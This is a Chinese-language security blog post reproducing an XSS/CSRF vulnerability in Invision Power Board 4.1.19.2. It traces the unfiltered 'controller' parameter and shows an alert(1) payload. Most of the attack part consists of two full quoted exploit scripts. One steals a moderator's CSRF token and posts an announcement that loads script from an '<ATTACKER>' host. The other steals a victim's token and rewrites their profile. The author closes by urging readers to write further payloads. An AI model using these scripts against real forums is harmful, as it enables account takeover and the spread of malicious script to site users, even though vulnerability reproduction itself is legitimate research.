<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="Invision Power Board 4.1.19.2 XSS / CSRF / File Upload / Information DisclosureIPB是一个集论坛展示与CMS的PHP平台。这套系统本身是不开源的，但是我为了复现该漏洞，从网上下载了该平台的一个盗版。该文件我已经作为附件上传到小密圈中了，有兴趣的圈友可以看看。
首先，根据原文，漏洞的触发点在http://&amp;lt;targ">
<meta property="og:type" content="article">
<meta property="og:title" content="IPS_4.1.19.2_XSS">
<meta property="og:url" content="http://dinfinite.cn/2017/08/08/IPS-4-1-19-2-XSS/index.html">
<meta property="og:site_name" content="D_infinite的小站">
<meta property="og:description" content="Invision Power Board 4.1.19.2 XSS / CSRF / File Upload / Information DisclosureIPB是一个集论坛展示与CMS的PHP平台。这套系统本身是不开源的，但是我为了复现该漏洞，从网上下载了该平台的一个盗版。该文件我已经作为附件上传到小密圈中了，有兴趣的圈友可以看看。
首先，根据原文，漏洞的触发点在http://&amp;lt;targ">
<meta property="og:image" content="http://i4.piimg.com/1949/23a9817e9037a221.png">
<meta property="og:image" content="http://i4.piimg.com/599904/4cb388f495634350.png">
<meta property="og:image" content="http://i1.buimg.com/599904/79a6d2e31518bdf3.png">
<meta property="og:image" content="http://i1.buimg.com/599904/33228f807d1e4ffa.png">
<meta property="og:image" content="http://i1.buimg.com/599904/dc35a20e29e748fe.png">
<meta property="og:image" content="http://i4.piimg.com/599904/ee5346621255a24a.png">
<meta property="og:updated_time" content="2017-08-08T03:33:36.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="IPS_4.1.19.2_XSS">
<meta name="twitter:description" content="Invision Power Board 4.1.19.2 XSS / CSRF / File Upload / Information DisclosureIPB是一个集论坛展示与CMS的PHP平台。这套系统本身是不开源的，但是我为了复现该漏洞，从网上下载了该平台的一个盗版。该文件我已经作为附件上传到小密圈中了，有兴趣的圈友可以看看。
首先，根据原文，漏洞的触发点在http://&amp;lt;targ">
<meta name="twitter:image" content="http://i4.piimg.com/1949/23a9817e9037a221.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://dinfinite.cn/2017/08/08/IPS-4-1-19-2-XSS/"/>





  <title>IPS_4.1.19.2_XSS | D_infinite的小站</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">D_infinite的小站</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">不积跬步，无以至千里。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tag"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://dinfinite.cn/2017/08/08/IPS-4-1-19-2-XSS/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="D_infinite">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="D_infinite的小站">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">IPS_4.1.19.2_XSS</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-08-08T11:28:24+08:00">
                2017-08-08
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/php/" itemprop="url" rel="index">
                    <span itemprop="name">php</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="Invision-Power-Board-4-1-19-2-XSS-CSRF-File-Upload-Information-Disclosure"><a href="#Invision-Power-Board-4-1-19-2-XSS-CSRF-File-Upload-Information-Disclosure" class="headerlink" title="Invision Power Board 4.1.19.2 XSS / CSRF / File Upload / Information Disclosure"></a>Invision Power Board 4.1.19.2 XSS / CSRF / File Upload / Information Disclosure</h3><p>IPB是一个集论坛展示与CMS的PHP平台。这套系统本身是不开源的，但是我为了复现该漏洞，从网上下载了该平台的一个盗版。该文件我已经作为附件上传到小密圈中了，有兴趣的圈友可以看看。</p>
<p>首先，根据原文，漏洞的触发点在<br><code>http://&lt;target&gt;/admin/convertutf8/index.php?controller=</code></p>
<p>作者说controller参数并没有很好的过滤，那么我们打开phpstrom的debug功能，对参数进行跟踪。</p>
<p><img src="http://i4.piimg.com/1949/23a9817e9037a221.png" alt=""></p>
<p>调用了run函数。</p>
<p><img src="http://i4.piimg.com/599904/4cb388f495634350.png" alt=""></p>
<p>拼接路径+controller参数+php后缀得到文件路径，判断该文件路径是否存在，不存在则跳入error。显然，我们输入的payload不可能真实存在对应的文件名，因此，进入error函数。</p>
<p><img src="http://i1.buimg.com/599904/79a6d2e31518bdf3.png" alt=""></p>
<p>error直接sendout一个error message给template，看起来好像没有问题，controller参数似乎并没有产生影响。我们接着跟进template。</p>
<p><img src="http://i1.buimg.com/599904/33228f807d1e4ffa.png" alt=""></p>
<p>我们可以看到,controller没经任何过滤机会直接赋给了template中的<code>$controller</code>变量。</p>
<p><img src="http://i1.buimg.com/599904/dc35a20e29e748fe.png" alt=""></p>
<p>确实，template中没有经过任何过滤就获取了controller参数，将其放入模板变量中替代。我们构造一下payload</p>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">?controller=<span class="string">'&#125;;alert(1);&#123;'</span></div></pre></td></tr></table></figure>
<p><img src="http://i4.piimg.com/599904/ee5346621255a24a.png" alt=""></p>
<p>成功弹框。根据这个XSS，可以构造出相应的针对管理员权限账号的CSRF。作者给出对应的EXP如下。</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div></pre></td><td class="code"><pre><div class="line"><span class="comment">/*</span></div><div class="line">http://www.sxcurity.pro/pocs/xss.js</div><div class="line"> _</div><div class="line">(_)_ ____      ___ __</div><div class="line">| | '_ \ \ /\ / / '_ \</div><div class="line">| | |_) \ V  V /| | | |</div><div class="line">|_| .__/ \_/\_/ |_| |_|</div><div class="line"> |_|  IPB Exploit</div><div class="line">      by @sxcurity</div><div class="line">*/</div><div class="line"></div><div class="line"><span class="comment">// specifies the target, the title of the announcement, and the xss payload!</span></div><div class="line"><span class="keyword">var</span> target = 'http:<span class="comment">//&lt;target&gt;/index.php?/modcp/announcements/&amp;action=create';</span></div><div class="line"><span class="keyword">var</span> title = 'URGENT';</div><div class="line"></div><div class="line"><span class="comment">// Don't use quotes! It'll break our form down below!</span></div><div class="line"><span class="keyword">var</span> payload = '&lt;script src=<span class="comment">//&lt;ATTACKER&gt;/lol.js&gt;&lt;/script&gt;';</span></div><div class="line"></div><div class="line"><span class="comment">// steals the csrf token ;)</span></div><div class="line"><span class="keyword">var</span> cdl = <span class="built_in">get</span>(target);</div><div class="line">document.body.innerHTML = cdl;</div><div class="line"><span class="keyword">var</span> <span class="keyword">form</span> = document.getElementsByTagName('<span class="keyword">input</span>')[3];</div><div class="line"><span class="keyword">var</span> <span class="keyword">token</span> = <span class="keyword">form</span>.value;</div><div class="line"></div><div class="line"><span class="comment">// DON'T EDIT!!</span></div><div class="line"><span class="comment">// Gets the current date! Thanks stackoverflow</span></div><div class="line"><span class="keyword">var</span> today = new <span class="built_in">Date</span>();</div><div class="line"><span class="keyword">var</span> dd = today.getDate();</div><div class="line"><span class="keyword">var</span> mm = today.getMonth()+1; <span class="comment">//January is 0!</span></div><div class="line"><span class="keyword">var</span> yyyy = today.getFullYear();</div><div class="line"><span class="keyword">if</span>(dd&lt;10)&#123;</div><div class="line">    dd='0'+dd;</div><div class="line">&#125;</div><div class="line"><span class="keyword">if</span>(mm&lt;10)&#123;</div><div class="line">    mm='0'+mm;</div><div class="line">&#125;</div><div class="line"><span class="keyword">var</span> today = mm+'/'+dd+'/'+yyyy;</div><div class="line"></div><div class="line"><span class="comment">// build form with valid token and evil credentials</span></div><div class="line">document.body.innerHTML</div><div class="line">  += '&lt;<span class="keyword">form</span> id=<span class="string">"sxcurity"</span> action=<span class="string">"' + target + '"</span> method=<span class="string">"POST"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"_submitted"</span> value=<span class="string">"1"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"csrfKey"</span> value=<span class="string">"' + token + '"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"MAX_FILE_SIZE"</span> value=<span class="string">"2097152"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"plupload"</span> value=<span class="string">"sxcurity"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_title"</span> value=<span class="string">"' + title + '"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_start"</span> value=<span class="string">"' + today +'"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_end_unlimited"</span> value=<span class="string">"0"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_content"</span> value=<span class="string">"'+ payload +'"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_content_upload"</span> value=<span class="string">"sxcurity"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_app_unlimited"</span> value=<span class="string">"*"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_calendars"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_calendars-zeroVal"</span> value=<span class="string">"on"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_download_categories"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_download_categories-zeroVal"</span> value=<span class="string">"on"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_forums"</span>&gt;'</div><div class="line">  + '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"announce_forums-zeroVal"</span> value=<span class="string">"on"</span>&gt;'</div><div class="line">  + '&lt;/<span class="keyword">form</span>&gt;';</div><div class="line"></div><div class="line"><span class="comment">// submits our csrf form!</span></div><div class="line">document.forms[<span class="string">"sxcurity"</span>].submit();</div><div class="line"></div><div class="line">function <span class="built_in">get</span>(url) &#123;</div><div class="line">    <span class="keyword">var</span> xmlHttp = new XMLHttpRequest();</div><div class="line">    xmlHttp.<span class="keyword">open</span>(<span class="string">"GET"</span>, url, false);</div><div class="line">    xmlHttp.send(null);</div><div class="line">    <span class="keyword">return</span> xmlHttp.responseText;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div></pre></td><td class="code"><pre><div class="line"><span class="comment">/*</span></div><div class="line">www.sxcurity.pro/pocs/lol.js</div><div class="line"> _</div><div class="line">(_)_ ____      ___ __</div><div class="line">| | '_ \ \ /\ / / '_ \</div><div class="line">| | |_) \ V  V /| | | |</div><div class="line">|_| .__/ \_/\_/ |_| |_|</div><div class="line"> |_|  IPB Exploit</div><div class="line">      by @sxcurity</div><div class="line"></div><div class="line">index.php?/profile/&lt;user&gt;/&amp;tab=field_core_pfield_1</div><div class="line">This will add "sxcurity is my hero" to the user's about me.</div><div class="line">*/</div><div class="line"><span class="keyword">var</span> target = 'http:<span class="comment">//localhost/ips_4141/index.php';</span></div><div class="line"><span class="keyword">var</span> payload = 'sxcurity is my hero';</div><div class="line"></div><div class="line"><span class="comment">// Gets the Profile URL of the victim.</span></div><div class="line"><span class="keyword">var</span> cdl = <span class="built_in">get</span>(target);</div><div class="line">document.body.innerHTML = cdl;</div><div class="line"><span class="keyword">var</span> user_url = document.getElementsByTagName('a')[13];</div><div class="line"><span class="keyword">var</span> user_url1 = document.getElementsByTagName('a')[14];</div><div class="line"><span class="keyword">var</span> user_url2 = document.getElementsByTagName('a')[15];</div><div class="line"><span class="keyword">var</span> user_url3 = document.getElementsByTagName('a')[16];</div><div class="line"><span class="keyword">var</span> user_url4 = document.getElementsByTagName('a')[17];</div><div class="line"><span class="keyword">var</span> user_url5 = document.getElementsByTagName('a')[18];</div><div class="line"><span class="keyword">var</span> user_url6 = document.getElementsByTagName('a')[19];</div><div class="line"><span class="keyword">var</span> user_url7 = document.getElementsByTagName('a')[20];</div><div class="line"><span class="keyword">var</span> yay = user_url.href;</div><div class="line"><span class="keyword">var</span> yay1 = user_url1.href;</div><div class="line"><span class="keyword">var</span> yay2 = user_url2.href;</div><div class="line"><span class="keyword">var</span> yay3 = user_url3.href;</div><div class="line"><span class="keyword">var</span> yay4 = user_url4.href;</div><div class="line"><span class="keyword">var</span> yay5 = user_url5.href;</div><div class="line"><span class="keyword">var</span> yay6 = user_url6.href;</div><div class="line"><span class="keyword">var</span> yay7 = user_url7.href;</div><div class="line"><span class="keyword">var</span> mod_check0 = document.getElementsByTagName('a')[22];</div><div class="line"><span class="keyword">var</span> mod_check1 = document.getElementsByTagName('a')[22];</div><div class="line"><span class="keyword">var</span> mod_check2 = document.getElementsByTagName('a')[23];</div><div class="line"><span class="keyword">var</span> mod_check3 = document.getElementsByTagName('a')[24];</div><div class="line"><span class="keyword">var</span> mod_check4 = document.getElementsByTagName('a')[25];</div><div class="line"><span class="keyword">var</span> mod_check5 = document.getElementsByTagName('a')[26];</div><div class="line"><span class="keyword">var</span> mod_check6 = document.getElementsByTagName('a')[27];</div><div class="line"><span class="keyword">var</span> check0 = mod_check1.href;</div><div class="line"><span class="keyword">var</span> check1 = mod_check1.href;</div><div class="line"><span class="keyword">var</span> check2 = mod_check2.href;</div><div class="line"><span class="keyword">var</span> check3 = mod_check3.href;</div><div class="line"><span class="keyword">var</span> check4 = mod_check4.href;</div><div class="line"><span class="keyword">var</span> check5 = mod_check5.href;</div><div class="line"><span class="keyword">var</span> check6 = mod_check5.href;</div><div class="line"></div><div class="line"></div><div class="line"><span class="comment">/*</span></div><div class="line">Mods / admins have a different amount of links before their profile URL, so this makes sure</div><div class="line">we grab the right profile URL and not some random one!</div><div class="line">*/</div><div class="line"><span class="keyword">if</span> (yay.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = normal user acc.</span></div><div class="line">  <span class="keyword">var</span> profile = yay;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (yay1.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = normal user acc.</span></div><div class="line">  <span class="keyword">var</span> profile = yay1;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (yay2.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = normal user acc.</span></div><div class="line">  <span class="keyword">var</span> profile = yay2;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (yay3.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = normal user acc.</span></div><div class="line">  <span class="keyword">var</span> profile = yay3;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (yay4.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = normal user acc.</span></div><div class="line">  <span class="keyword">var</span> profile = yay4;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (yay5.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = normal user acc.</span></div><div class="line">  <span class="keyword">var</span> profile = yay5;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (yay6.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = normal user acc.</span></div><div class="line">  <span class="keyword">var</span> profile = yay6;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (yay7.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = normal user acc.</span></div><div class="line">  <span class="keyword">var</span> profile = yay7;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (check0.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = mod or admin</span></div><div class="line">  <span class="keyword">var</span> profile = check0;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (check2.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = mod or admin</span></div><div class="line">  <span class="keyword">var</span> profile = check2;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (check3.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = mod or admin</span></div><div class="line">  <span class="keyword">var</span> profile = check3;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (check4.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = mod or admin</span></div><div class="line">  <span class="keyword">var</span> profile = check4;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (check5.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = mod or admin</span></div><div class="line">  <span class="keyword">var</span> profile = check5;</div><div class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (check6.includes(<span class="string">"profile"</span>))&#123;</div><div class="line">  <span class="comment">//user = mod or admin</span></div><div class="line">  <span class="keyword">var</span> profile = check6;</div><div class="line">&#125;</div><div class="line"><span class="keyword">var</span> final = profile + '<span class="keyword">edit</span>/';</div><div class="line"></div><div class="line"><span class="comment">// steals the csrf token</span></div><div class="line"></div><div class="line"><span class="keyword">var</span> csrf = <span class="built_in">get</span>(final);</div><div class="line">document.body.innerHTML = csrf;</div><div class="line"><span class="keyword">var</span> <span class="keyword">inp</span> = document.getElementsByTagName('<span class="keyword">input</span>')[3];</div><div class="line"><span class="keyword">var</span> <span class="keyword">token</span> = <span class="keyword">inp</span>.value;</div><div class="line"></div><div class="line"><span class="comment">// build form with valid token and evil credentials</span></div><div class="line">document.body.innerHTML</div><div class="line">+= '&lt;<span class="keyword">form</span> id=<span class="string">"woot"</span> action=' + final + ' method=<span class="string">"POST"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"form_submitted"</span> value=<span class="string">"1"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"csrfKey"</span> value=<span class="string">"' + token + '"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"MAX_FILE_SIZE"</span> value=<span class="string">"2097152"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"plupload"</span> value=<span class="string">"sxcurity"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"bday[month]"</span> value=<span class="string">"0"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"bday[day]"</span> value=<span class="string">"0"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"bday[year]"</span> value=<span class="string">"0"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"enable_status_updates"</span> value=<span class="string">"0"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"enable_status_updates_checkbox"</span> value=<span class="string">"1"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"core_pfield_1"</span> value=<span class="string">"' + payload + '"</span>&gt;'</div><div class="line">+ '&lt;<span class="keyword">input</span> <span class="keyword">type</span>=<span class="string">"hidden"</span> name=<span class="string">"core_pfield_1_upload"</span> value=<span class="string">"sxcurity"</span>&gt;'</div><div class="line">+ '&lt;/<span class="keyword">form</span>&gt;';</div><div class="line"></div><div class="line"><span class="comment">// submits our csrf form!</span></div><div class="line">document.forms[<span class="string">"woot"</span>].submit();</div><div class="line"></div><div class="line">function <span class="built_in">get</span>(url) &#123;</div><div class="line">    <span class="keyword">var</span> xmlHttp = new XMLHttpRequest();</div><div class="line">    xmlHttp.<span class="keyword">open</span>(<span class="string">"GET"</span>, url, false);</div><div class="line">    xmlHttp.send(null);</div><div class="line">    <span class="keyword">return</span> xmlHttp.responseText;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>这是两个不同的payload，具体做了什么就当是留给各位的一个小小的问题。并且各位可以发挥自己的想象力，我们还可以去实现怎样的攻击，写出更好玩的payload。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/07/03/python编写简单netcat/" rel="next" title="python编写简单netcat">
                <i class="fa fa-chevron-left"></i> python编写简单netcat
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/08/12/finecms-5-08-前台getshell/" rel="prev" title="finecms_5.08_前台getshell">
                finecms_5.08_前台getshell <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
